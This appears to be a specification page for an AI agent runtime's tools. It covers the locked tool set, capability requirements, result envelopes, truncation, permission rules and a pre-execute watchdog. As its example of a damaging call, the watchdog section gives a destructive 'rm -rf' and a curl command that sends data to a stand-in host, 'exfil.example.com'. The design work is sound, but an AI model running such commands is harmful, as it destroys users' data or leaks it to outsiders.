Skip to main content

Tools

A tool is a callable capability exposed to the agent. Every tool — locked, agent-specific, MCP, plugin-defined — obeys the same contract: self-describing parameters, declared capability requirements, a uniform result envelope. The agent loop sees one shape; the model learns one mental model.

Tool contract

A tool MUST publish:

FieldTypeRequiredDescription
idstringyesStable identifier. Reused across agents and across sessions.
descriptionstringyesProse the model reads to decide whether to call.
parametersJSON SchemayesValidated by the runtime before execute. A schema failure is a tool error, not an exception.
requiresRequirementSetyesThe capability surface this tool needs. See Capability requirements.
execute(args, runtime) → ResultyesThe runtime hands a typed capability surface; the tool calls into it.

The runtime computes the effective capability set for the agent as the union of the agent manifest's requires and every tool's requires. Adding a tool to an agent MUST automatically extend the sandbox; the manifest does not need a parallel update.

Locked fundamental tools

Every implementation MUST ship the locked set. Models trained on tool use have learned these names; renaming read to something else measurably degrades quality. The set is the smallest union of what a code agent, a design agent, and a research agent all need.

IdPurposeCapability declared
readRead a file from the rootfs.read
writeCreate or overwrite a file in the rootfs.write
editString-replace edit on an existing filefs.read + fs.write
globList files by patternfs.read
grepRegex search across the rootfs.read
bashRun a shell command under a sub-policyshell.run (per-call sub-policy)
todoWrite a todo list to a session-scoped storenone (session-internal)
taskSpawn a subagent — see subagentsderived from parent
questionPause and ask the user a structured questionnone (host-mediated, synchronous)
web_searchSearch the webnet.fetch (against the configured provider host)
web_fetchFetch a URL and convert to textnet.fetch
skillLoad a discovered skill's body into context — see skillsnone (session-internal index)
tool_searchDiscover MCP / extension tools by query — see mcpnone (session-internal index)

The locked set is non-opinionated. Each tool is the smallest thing it can be:

  • edit is string-replace, not a model-of-the-codebase.
  • bash is a single command, not a shell session.
  • web_search is a query + results, not a crawler.
  • task is a synchronous (or background) call, not a workflow engine.

Implementors who need richer behavior layer it via MCP, plugin tools, or agent-specific tools. They MUST NOT redefine the locked id with a richer shape — the lock guarantees portability.

Common extensions seen on top of the lock. A code-shaped agent typically ships additional tools beyond the lock. Names are not standardized, but a recurring catalog includes:

ToolWhat it does
repo_cloneClone a remote repository into the workspace.
repo_overviewReturn a structural summary of a repository (file tree + language stats).
apply_patchApply a unified-diff patch atomically across multiple files.
lspSurface language-server features (definitions, references, diagnostics).
plan / plan_exitThe plan/build opinionated workflow's exit hook (see subagents).

These are deliberately out of the lock because they are domain (code-agent) tools, not universal. A design-agent or document-agent host can ship its own equivalents without colliding.

The question tool

The only locked tool that pauses the run on a human. The agent emits one or more structured questions; the loop suspends until the host returns answers. Headless hosts (CI, scheduled agents, hosted batch) MUST treat question as a tool error with a fixed message — the model gets the refusal in its next turn and falls back to its best guess.

question({
questions: [
{
question: string,
header?: string,
options?: { label: string, description?: string }[],
multi_select?: boolean,
}
]
}){ answers: string[][] } // one array per question

The question tool is in the lock because the difference between an agent that asks and one that guesses is product-shaping, not optional. Putting it in the lock means every host wires a question UI (or the headless refusal) once, instead of every agent author re-inventing it.

The task subagent tool

task is in the lock because subagents are a primitive, not a feature. An agent that cannot delegate has a fundamentally different shape from one that can. See subagents for the recursion model, permission inheritance, and inspectability.

The skill and tool_search tools

Both exist to shrink the context the model sees while still letting it reach for things it did not load up front. Skills appear in the system prompt as one-line descriptions; their bodies load on demand through skill. MCP tools, when many, live in an index the model searches with tool_search; only the searched-for tools wire in. See skills and mcp.

A fundamental tool that is not implementable in-house. The model needs it; the host wires a real provider (search APIs, hosted search endpoints).

The shape on the wire:

web_search({
query: string,
max_results?: int,
}){ results: { title, url, snippet }[] }

Provider seam: the provider is the host's choice and SHOULD be stable per session (hash the session id to pick) so a flaky provider fails consistently and inspection sees one row, not a random walk.

Cost / quota: the tool implementation MUST cap per-session calls and MUST time out individual calls. Both numbers are host config; sensible defaults are 25 calls/session and 15s per call.

Capability requirements

A tool's requires declares the runtime surface it depends on:

RequirementSet = {
fs?: {
read?: PathPattern[], // patterns relative to the workspace root
write?: PathPattern[],
},
net?: {
hosts?: HostPattern[], // outbound hosts the tool may reach
},
shell?: ShellRunRequirement[], // see ShellRunRequirement below
capabilities?: CapabilityName[], // any capability not covered above
}

ShellRunRequirement = {
cmd: string, // executable name, e.g. "git", "ls", "node"
args?: ArgPattern[], // ordered patterns matched against argv[1..]
}

ArgPattern =
| string // exact-match
| { wildcard: true } // matches one positional arg
| { prefix: string } // matches an arg starting with the prefix

Path and host patterns SUPPORT variable expansion. The standard variables:

VariableExpands to
{workspace}The workspace root (and any additional roots the manifest declares).
{ad-hoc}Directories of currently-open ad-hoc files when the host supports them.
{user-data}The host's per-user data directory.

Empty expansion (e.g. {workspace} with no open workspace) yields an empty effective scope; the tool's calls fail closed. An undefined variable name (typo) MUST throw at manifest compile time.

Tool result envelope

Every tool returns the same envelope:

{
type: "output" | "error",
data: <tool-specific JSON>, // when "output"
error_text: string, // when "error"
metadata: {
duration_ms: int,
truncated?: bool, // see Truncation below
output_path?: string, // see Truncation below
}
}

The uniform envelope serves three downstream layers:

  • The recorder, which writes the result to a chat_parts row.
  • The replay layer, which re-emits the result deterministically.
  • The model itself, which develops one mental model for "what comes back from a tool."

Truncation

Tool outputs can be enormous (a grep over a large repository, a long file read). The runtime applies a per-tool max output size; bytes beyond that go to a sidecar file path, and the result carries the head + a truncated: true flag.

{
type: "output",
data: { head: "<first N bytes>",},
metadata: {
truncated: true,
output_path: "/tmp/grep-output-prt_…",
}
}

The model sees the head and the path; if it needs more, it calls read on the path. The sidecar file lives under the host's per-session working directory; the runtime cleans it up when the session closes.

Per-tool defaults (recommended):

ToolDefault max outputNotes
read200 KBLarger reads go through read with byte ranges, not the truncate path.
glob1000 entriesThe 1001st triggers truncation.
grep200 matchesSame.
bash200 KB combined stdout+stderrAnything past goes to the sidecar path.
web_fetch200 KBAfter text extraction; not raw HTML.
Otherimplementation-defined

Hosts MAY tune these per product. The shape (head + output_path) is fixed.

Permissions at the tool boundary

Permissions are a ruleset, not an allowlist. A rule is (permission, pattern, action):

  • permission: a tool id (bash), a capability name (fs.write), or a wildcard (*).
  • pattern: the argument pattern the rule applies to (a shell command pattern, a filesystem path, an HTTP host). Patterns support glob (**/*.py) and prefix matching.
  • action: allow / deny / ask. Default ask.

Rule sources

Rules layer across three scopes (manifest / session / project). The most specific matching rule wins; a manifest deny CANNOT be turned into an allow by a session or project rule. See session / permission scopes for the scope table and evaluation order, and subagents / permission inheritance for the deny-inheritance rule.

Headless hosts

Hosts without a user (CI, scheduled agents, hosted batch) MUST treat ask as deny. The agent system MUST NOT invent answers.

The watchdog

A pre-execute hook on every tool call. The watchdog sees the tool id, the validated arguments, the agent's manifest, and the session id, and returns one of:

  • allow — the call proceeds.
  • deny(reason) — the call fails. The model gets the reason as a tool error and can adjust on the next turn.
  • ask — only on hosts with a human; the host shows the call, the user picks once / always / reject. Headless hosts treat as deny.

The watchdog is pre-execute because the damaging act of a shell call (rm -rf, curl <data> exfil.example.com) is the call itself. Post-call rejection is too late.

The watchdog is independent of capability scopes. It can refuse calls that the manifest's requires would have allowed; it cannot permit calls the manifest's requires would have refused. The runtime's capability check runs before the watchdog as the first defense.

Defense in depth

Three independent layers, any one of which is sufficient for its kind of failure:

  1. Capability check — the runtime refuses out-of-scope paths and hosts at the API boundary. No model output reaches the OS.
  2. Watchdog — refuses categories of arguments the capability check cannot express ("no commands that look like exfiltration").
  3. Environment sandbox — refuses anything the runtime mis-let-through. See environments.

A change to one layer SHOULD NOT require changes to the others.

ACP tool kind taxonomy

When the agent is fronted by an ACP adapter, every emitted tool call carries a kind (read / edit / search / execute / fetch / think / other and a few more). The kind drives client UI — icon, inline diff renderer, terminal pane.

The full mapping from locked tools to ACP kinds lives in acp / tool kind mapping. Hosts without an ACP adapter ignore the taxonomy.

Implementor checklist

A conforming tool implementation MUST:

  • Publish id, description, JSON-schema parameters, and requires at registration.
  • Validate parameters before calling execute. A schema failure yields a tool error with the schema validation message; it MUST NOT throw.
  • Surface side effects only through the typed runtime — never reach into the host's filesystem, network, or shell directly.
  • Return the uniform { type, data | error_text, metadata } envelope.
  • Honor the abort signal: when the session aborts, an in-flight tool SHOULD stop work and return an error or a partial result.

See also

  • Foundations — the AI SDK chunk shape tool I/O rides on, and the streaming substrate.
  • Skills — the skill tool's library.
  • MCP — the tool_search tool's catalog.
  • Subagents — the task tool's recursion model.
  • Environments — which capabilities each environment exposes.
  • ACP integration — the kind taxonomy and the session/request_permission wire.